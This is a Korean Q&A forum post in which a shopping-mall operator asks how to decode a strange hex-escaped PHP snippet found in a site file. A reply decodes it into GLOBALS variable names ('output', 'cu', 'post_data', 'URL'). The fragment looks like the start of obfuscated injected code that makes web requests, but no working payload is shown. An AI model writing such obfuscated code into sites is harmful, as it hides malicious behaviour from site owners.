코드 질문입니다

코드 질문입니다

QA

코드 질문입니다

본문


쇼핑몰에 어떤 PHP파일을 에디터로 열었는데 

 

 

<?php ${"\x47L\x4fB\x41\x4c\x53"}["\x6fg\x6b\x64\x74lj\x74"]="\x6fut\x70ut";${"G\x4cO\x42\x41\x4c\x53"}
?>

 

이런 이상한 코드가 보이는군요..

2진수,8진수,16진수도 아닌것 같구요.

저 코드를 해독할 방법은 없습니까? 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
바쁘신 시간에 감사합니다.
 
실력이 부족하다보니, 다른 사용자분들께 도움은 못되고,
 
항상 고수님들의 도움만 받게 되는군요..ㅎㅎ
 
그동안 저에게 도움을 주셨던 모든 분들 정말 고맙구요...
 
오늘 들려주신 고수님들도 즐거운 하루 되시길 바랍니다.
 
아~ 하단에 코드에 대해 말씀을 안 드렸군요..
 
제 쇼핑몰에 어떤 PHP파일을 에디터로 열었봤더니만...
 
이상한 코드가 보이는군요..
 
2진수,8진수,16진수도 아닌것 같구요.
 
저 코드를 해독할 방법은 없을까요?
 
바쁘신 시간이겠지만, 조언을 해주시면 대단히 고맙겠습니다.
 
감사합니다.

 




 

이 질문에 댓글 쓰기 :

답변 2

<?php
${"GLOBALS"}["ogkdtljt"]    = "output";
${"GLOBALS"}["ssokfisuf"]    = "cu";
${"GLOBALS"}["cswfclypmwej"] = "post_data";
${"GLOBALS"}["yelerhirjh"]  = "URL";
?>

 

참고하세요~~ 

답변을 작성하시기 전에 로그인 해주세요.
전체 123,672 | RSS
QA 내용 검색

회원로그인

(주)에스아이알소프트 / 대표:홍석명 / (06211) 서울특별시 강남구 역삼동 707-34 한신인터밸리24 서관 1404호 / E-Mail: admin@sir.kr
사업자등록번호: 217-81-36347 / 통신판매업신고번호:2014-서울강남-02098호 / 개인정보보호책임자:김민섭(minsup@sir.kr)
© SIRSOFT